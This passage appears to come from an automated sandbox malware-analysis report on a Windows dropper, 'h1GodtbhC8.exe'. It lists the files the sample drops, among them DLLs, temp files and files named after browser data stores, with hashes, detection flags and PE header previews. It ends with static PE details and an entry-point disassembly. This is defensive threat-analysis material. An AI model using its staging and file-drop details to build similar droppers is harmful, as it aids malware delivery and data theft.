                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\download\zlib1.dll
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\ecv38E9.tmp
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\1607186572092.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\ecv77D7.tmp
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\1607186588295.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\gdiview.msi
                                                                                                                                                  Process:C:\Program Files (x86)\71eza90awf48\aliens.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\Sibuia.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\h1GodtbhC8.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):540456
                                                                                                                                                  Entropy (8bit):6.4900404695826275
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:GUBa9WxfxYRW3vwDaduy2NBCzrCJDVxsR7LafByUb2iqyTOHD:da9WxfiRCv2anZnXtLa32idOHD
                                                                                                                                                  MD5:EB948284236E2D61EAE0741280265983
                                                                                                                                                  SHA1:D5180DB7F54DE24C27489B221095871A52DC9156
                                                                                                                                                  SHA-256:DBE5A7DAF5BCFF97F7C48F9B5476DB3072CC85FBFFD660ADAFF2E0455132D026
                                                                                                                                                  SHA-512:6D8087022EE62ACD823CFA871B8B3E3251E44F316769DC04E2AD169E9DF6A836DBA95C3B268716F2397D6C6A3624A9E50DBE0BC847F3C4F3EF8E09BFF30F2D75
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                  • Filename: h1GodtbhC8.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: KeJ7Cl7flZ.exe, Detection: malicious, Browse
                                                                                                                                                  Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......A.....}...}...}^..|...}...|...}^..|...}^..|...}^..|...}^..|$..}...}x..}...|...}...|...}...|z..}...|...}...|...}..?}...}..W}...}...|...}Rich...}........................PE..L....mU_...........!.....2...................P.......................................8....@.........................@...\................"........... ..(....0..LH..X(..p....................).......(..@............P...............................text....1.......2.................. ..`.rdata...]...P...^...6..............@..@.data....I..........................@....rsrc....".......$..................@..@.reloc..LH...0...J..................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe
                                                                                                                                                  Process:C:\Users\user\Desktop\h1GodtbhC8.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4387715
                                                                                                                                                  Entropy (8bit):7.97481744127675
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:98304:MemWK3AGUr0csa0JN5DHJiLvIELr2zEj94woNcqCYX/WDvPHjAOLutkiUs:pmWK3AG6ga0jVgLIEV4FLzeDvPH5AUs
                                                                                                                                                  MD5:69C9BA53239D6838D05594D96A36DEA3
                                                                                                                                                  SHA1:3DE1717040C9803FF67EF6C0CD218B45FD051CA8
                                                                                                                                                  SHA-256:CFAADE4B15040D0EC25112E808AAADA0BBDC378B5E4439D8C7620FEDB6359CA1
                                                                                                                                                  SHA-512:FC86C62A014B11139476CF658B6EF97AB210D2A2E8B4128E58D9A186037764B328E819A345606272D5BDFDFE7729F402631214D9371BE0B60EBB7F45FCC90141
                                                                                                                                                  Malicious:false
                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                  • Filename: h1GodtbhC8.exe, Detection: malicious, Browse
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'...Rich&...................PE..L....~.^..................................... ....@..........................0............@.............................4...4...<.... ..p.......................d"......T............................D..@............ ..`....... ....................text...*........................... ..`.rdata...... ......................@..@.data... 7..........................@....didat..............................@....rsrc........ ......................@..@.reloc..d".......$..................@..B........................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\SibCa.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\h1GodtbhC8.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4096
                                                                                                                                                  Entropy (8bit):6.867501832742936
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:PAWqGuIO1w7JElw764ulqk4uWdCXufAx8Su2yk:oWaIO1S7ulqBhv+yk
                                                                                                                                                  MD5:04F3C7753A4FCABCE7970BFA3B5C76FF
                                                                                                                                                  SHA1:34FC37D42F86DAC1FD1171A806471CDFEAE9817B
                                                                                                                                                  SHA-256:A735E33A420C2AD93279253BC57137947B5D07803FF438499AAAF6FD0692F4CD
                                                                                                                                                  SHA-512:F774FC3F3EBF029DC6F122669060351CC58AE27C5224ABE2A6C8AB1308C4B796657D2F286760EB73A2AE7563EEEF335DAA70ED5E4B2560D34CA9873017658AFE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ..MZ.........0......8-..@.8.0..p.........!...L.!This. program. cannot .be run i.n DOS mo.de....$...PE..L....d82........!..0............. ..B................... ...........@..*..-......#......`....O...+h..........(.Q..........8W.....O......HA...text..........u.[.......`.rsrc...M;.}.t.......@.0relo...U..)......B.......5...&......S..4o.......F.......s....(.....*..(....{.%...{.9....[...4.*..(".....}...."}A...}....D.}..6..B.(...+**D...* 6..si.......*...0.....,....(.....~......oRj..*&.....N"(@M.-...on.A..0......!H.(...o...."r..p(...(.E..r@.po.@.....o..........%.B.....(.@........o...&..% ....o.x......u...,..B...o!..B!....!...~...Tu.."..[......#E..8...o"..$Q ....c..o....*..*..`......IT..G.:. `....@;.`.0...`. 5.@.r?..pB1..s#.....A.R.%.r..p.%.DrW...%..*rFq .b*..s....%.o%@.%.oB&....o'...Do(..........o)......"o.>.o+..,oE..,a..+?.,-.@.t.7.a-%o......Yo/.../.o.].....-...r..../. #"...1..-......u.>....., ...o2......#...>....L....X..a"0.$..V..h".r..."3a..r.`.rZ@..p.(4 ....+!rh..c.B..r...po..D.U.*..*.
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\SibClr.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\h1GodtbhC8.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):52520
                                                                                                                                                  Entropy (8bit):6.011934677477037
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:9GyM4uxlvOe/c1xpfLIa97v3A5KobiPWh:9G1vt/g7fLb97Y5VmY
                                                                                                                                                  MD5:928E680DEA22C19FEBE9FC8E05D96472
                                                                                                                                                  SHA1:0A4A749DDFD220E2B646B878881575FF9352CF73
                                                                                                                                                  SHA-256:8B6B56F670D59FF93A1C7E601468127FC21F02DDE567B5C21A5D53594CDAEF94
                                                                                                                                                  SHA-512:5FBC72C3FA98DC2B5AD2ED556D2C6DC9279D4BE3EB90FFD7FA2ADA39CB976EBA7CB34033E5786D1CB6137C64C869027002BE2F2CAD408ACEFD5C22006A1FEF34
                                                                                                                                                  Malicious:false
                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                  • Filename: h1GodtbhC8.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: KeJ7Cl7flZ.exe, Detection: malicious, Browse
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d82............!..0.................. ........... ....................... ............@.....................................O.......h...............(...............8............................................ ............... ..H............text........ ...................... ..`.rsrc...h...........................@..@.reloc..............................@..B........................H........S..4o..........................................................F......s....(....*..(....*..{....*..{....*..{....*..{....*..(......}......}......}.......}....*6..{....(...+**..{......*6..si........*...0...........(.....~........oj...*&~.......*N(....-.~.....on...*.0..........(....o......r...p(....(....r...po.......o...........%.~.......(..........o....&........o .......u....,.~......o!...on... ...!...~..u....,.~......o!...on... ..."...[..u....,.~......o!...on... ...#
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\xldl.dat
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\xldl.dll
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Web Data1607186582842
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\crx.7z
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\crx.json
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Localwebdata1607186582842
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Roaming\1607186572092.exe
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Roaming\1607186572092.txt
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\1607186572092.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Roaming\1607186588295.exe
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Roaming\1607186588295.txt
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\1607186588295.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Entropy (8bit):7.978069787985718
                                                                                                                                                  TrID:
                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                  File name:h1GodtbhC8.exe
                                                                                                                                                  File size:4671378
                                                                                                                                                  MD5:3ca6df4914385efd4ba9cd239b5ed254
                                                                                                                                                  SHA1:b66535ff43334177a5a167b9f2b07ade75484eec
                                                                                                                                                  SHA256:0acebaf80946be0cb3099233e8807aa775c8304fc3dee48d42241ff68b7ab318
                                                                                                                                                  SHA512:7951ab74ecd2ea26ed7bbcbc8bf34a770854a8fb009f256f93d72c705871b5a31c24153cc77581eec6544085cdbb51a170b2b7ef9f3f9139572b818d75424ca6
                                                                                                                                                  SSDEEP:98304:ijIHEaC7gS8j+u8ME/F59JdQVDQYxb6FqrnGGs3ycc6dNIdvlDPAQ1q14gaT:ijeEaC7gS6wMEdv4BQYhGPNPgdvlDHoG
                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8.....

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:5c5cd81ce4e4e0e2

                                                                                                                                                  Static PE Info

                                                                                                                                                  General

                                                                                                                                                  Entrypoint:0x4038af
                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                  Digitally signed:false
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                  Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                  TLS Callbacks:
                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                  OS Version Major:5
                                                                                                                                                  OS Version Minor:0
                                                                                                                                                  File Version Major:5
                                                                                                                                                  File Version Minor:0
                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                  Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                                                                                  Entrypoint Preview

                                                                                                                                                  Instruction
                                                                                                                                                  sub esp, 000002D4h
                                                                                                                                                  push ebx
                                                                                                                                                  push ebp
                                                                                                                                                  push esi
                                                                                                                                                  push edi
                                                                                                                                                  push 00000020h
                                                                                                                                                  xor ebp, ebp
                                                                                                                                                  pop esi
                                                                                                                                                  mov dword ptr [esp+18h], ebp
                                                                                                                                                  mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                  mov dword ptr [esp+14h], ebp
                                                                                                                                                  call dword ptr [00409030h]
                                                                                                                                                  push 00008001h
                                                                                                                                                  call dword ptr [004090B4h]
                                                                                                                                                  push ebp
                                                                                                                                                  call dword ptr [004092C0h]
                                                                                                                                                  push 00000008h
                                                                                                                                                  mov dword ptr [0047EB98h], eax
                                                                                                                                                  call 00007F158C36174Bh
                                                                                                                                                  push ebp
                                                                                                                                                  push 000002B4h
                                                                                                                                                  mov dword ptr [0047EAB0h], eax
                                                                                                                                                  lea eax, dword ptr [esp+38h]
                                                                                                                                                  push eax
                                                                                                                                                  push ebp
                                                                                                                                                  push 0040A264h
                                                                                                                                                  call dword ptr [00409184h]
                                                                                                                                                  push 0040A24Ch
                                                                                                                                                  push 00476AA0h
                                                                                                                                                  call 00007F158C36142Dh
                                                                                                                                                  call dword ptr [004090B0h]
                                                                                                                                                  push eax
                                                                                                                                                  mov edi, 004CF0A0h
                                                                                                                                                  push edi
                                                                                                                                                  call 00007F158C36141Bh
                                                                                                                                                  push ebp
                                                                                                                                                  call dword ptr [00409134h]
                                                                                                                                                  cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                  mov dword ptr [0047EAB8h], eax
                                                                                                                                                  mov eax, edi
                                                                                                                                                  jne 00007F158C35ED1Ah
                                                                                                                                                  push 00000022h
                                                                                                                                                  pop esi
                                                                                                                                                  mov eax, 004CF0A2h
                                                                                                                                                  push esi
                                                                                                                                                  push eax
                                                                                                                                                  call 00007F158C3610F1h
                                                                                                                                                  push eax
                                                                                                                                                  call dword ptr [00409260h]
                                                                                                                                                  mov esi, eax
                                                                                                                                                  mov dword ptr [esp+1Ch], esi
                                                                                                                                                  jmp 00007F158C35EDA3h
                                                                                                                                                  push 00000020h
                                                                                                                                                  pop ebx
                                                                                                                                                  cmp ax, bx
                                                                                                                                                  jne 00007F158C35ED1Ah
                                                                                                                                                  add esi, 02h
                                                                                                                                                  cmp word ptr [esi], bx

                                                                                                                                                  Rich Headers

                                                                                                                                                  Programming Language:
                                                                                                                                                  • [ C ] VS2010 SP1 build 40219
                                                                                                                                                  • [RES] VS2010 SP1 build 40219
                                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                                                  • [LNK] VS2010 SP1 build 40219

                                                                                                                                                  Data Directories

                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1340000xc308.rsrc
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                  Sections

